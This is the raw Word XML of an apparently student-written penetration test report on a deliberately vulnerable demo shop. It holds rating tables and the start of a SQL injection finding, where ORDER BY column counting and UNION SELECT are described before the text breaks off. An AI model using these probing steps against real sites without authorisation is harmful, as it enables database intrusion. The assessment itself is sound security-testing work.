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2BA5" w:rsidRDefault="00AC1A20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1A20">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment of Web Applications and Recommendations for Actions: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00563E91" w:rsidRDefault="00EC2BA5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r w:rsidR="00AC1A20" w:rsidRPr="00AC1A20">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRPr="004E615C" w:rsidRDefault="004E615C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E615C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E615C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Currently, there is no single system or application that is not vulnerable to attack. In the case of this study, the vulnerable web application is designed with a weak security policies that made it susceptible to most vulnerabilities for penetration testing. This report will cover vulnerable web application penetration test and report. The test report will include tw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="004E615C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities found, each with an explanation, impact score, the probability of exploitation, and security mechanism to protect the system against the attack. The investigation will cover the working mechanism of SQL injection and a novel way to protect against the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRPr="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E615C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Definitions of Impact and probability of exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E615C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Impact of exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="761" w:tblpY="14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3690"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E615C" w:rsidTr="00A331C8">
        <w:trPr>
          <w:trHeight w:val="759"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Consequences of exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E615C" w:rsidTr="00A331C8">
        <w:trPr>
          <w:trHeight w:val="757"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Even if the attack is successful, the attacker would not have control over what’s being exploited, modification of the contents is not also possible. Hence, the attack impact scope may be limited to only allowing an attacker to access a specific level of only viewing the system content.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E615C" w:rsidTr="00A331C8">
        <w:trPr>
          <w:trHeight w:val="757"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>The attack needs some pre-conditions for the attacker to exploit the whole system because the system is configured with some security measures. Therefore, a successful attack may allow little modifications on the specific system contents which may not affect the entire system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E615C" w:rsidTr="00A331C8">
        <w:trPr>
          <w:trHeight w:val="757"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C" w:rsidP="004E615C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="4472C4" w:themeColor="accent5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>There is a total compromise of the whole system, and therefore, loss in system protections, which leads to full system files and configuration disclosure. Moreover, an attacker can modify or control the entire system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004E615C" w:rsidRDefault="004E615C"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4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC2BA5">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Probability of Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="7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5"/>
        <w:gridCol w:w="3825"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC2BA5" w:rsidTr="009C6BFD">
        <w:trPr>
          <w:trHeight w:val="934"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Chances of Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC2BA5" w:rsidTr="009C6BFD">
        <w:trPr>
          <w:trHeight w:val="932"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>There is a need for sophisticated tools to bypass systems restrictions to expose the vulnerability before starting to exploit the system. So, this vulnerability is very unlikely to occur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC2BA5" w:rsidTr="009C6BFD">
        <w:trPr>
          <w:trHeight w:val="932"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>The chance for this kind of vulnerability to occur requires some preconditions. So, this vulnerability occurs moderately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC2BA5" w:rsidTr="009C6BFD">
        <w:trPr>
          <w:trHeight w:val="932"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3825" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>For this vulnerability to be exposed, require only some open available tools with some little knowledge. So, this weakness is very common to occur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="00077C71">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004023AE" w:rsidRDefault="004023AE" w:rsidP="00077C71">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRPr="00522CC0" w:rsidRDefault="00C700EC" w:rsidP="00C700EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00522CC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004023AE" w:rsidRDefault="004023AE" w:rsidP="00077C71">
      <w:pPr>
        <w:rPr>
          <w:rtl/>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5"/>
        <w:gridCol w:w="4615"/>
      </w:tblGrid>
      <w:tr w:rsidR="004023AE" w:rsidTr="00C700EC">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="004023AE" w:rsidRPr="004023AE" w:rsidRDefault="004023AE" w:rsidP="004023AE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004023AE" w:rsidTr="007D22C1">
        <w:trPr>
          <w:trHeight w:val="220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4615"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4023AE" w:rsidRPr="00C700EC" w:rsidRDefault="004023AE" w:rsidP="004023AE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C700EC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4615"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4023AE" w:rsidRDefault="004023AE" w:rsidP="004023AE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C700EC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Probability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004023AE" w:rsidTr="004023AE">
        <w:trPr>
          <w:trHeight w:val="220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4615"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4023AE" w:rsidRPr="00C700EC" w:rsidRDefault="004023AE" w:rsidP="004023AE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent4"/>
                  </w14:solidFill>
                  <w14:prstDash w14:val="solid"/>
                  <w14:round/>
                </w14:textOutline>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C700EC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="FFC000" w:themeColor="accent4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="004023AE" w:rsidRDefault="004023AE" w:rsidP="004023AE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C700EC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC2BA5" w:rsidRDefault="00EC2BA5" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00473FA1" w:rsidRDefault="00473FA1" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00473FA1" w:rsidRDefault="00473FA1" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00473FA1">
        <w:rPr>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473FA1" w:rsidRDefault="00473FA1" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00473FA1" w:rsidRPr="00A137BC" w:rsidRDefault="00473FA1" w:rsidP="00A137BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">In the category page i found when i ordered more than 8 columns that give me </w:t>
      </w:r>
      <w:r w:rsidR="00A137BC" w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A137BC" w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Internal Server Erro</w:t>
      </w:r>
      <w:r w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473FA1" w:rsidRDefault="00A137BC" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">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s - Gin &amp; Juice Shop — Mozilla Firefox 10_22_2024 11_10_4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rsidR="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="00A137BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and when i ordered by 8 or less give me </w:t>
      </w:r>
      <w:r w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A137BC" w:rsidRPr="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="00A137BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">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s - Gin &amp; Juice Shop — Mozilla Firefox 10_22_2024 11_10_1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rsidR="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="00A137BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">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s - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 5_03_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rsidR="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A137BC" w:rsidRDefault="00A137BC" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">But we not sure about numbers of columns so I use </w:t>
      </w:r>
      <w:r w:rsidRPr="009C298B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prove that </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C298B" w:rsidRDefault="009C298B" w:rsidP="009C298B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C298B" w:rsidRPr="009C298B" w:rsidRDefault="009C298B" w:rsidP="009C298B">
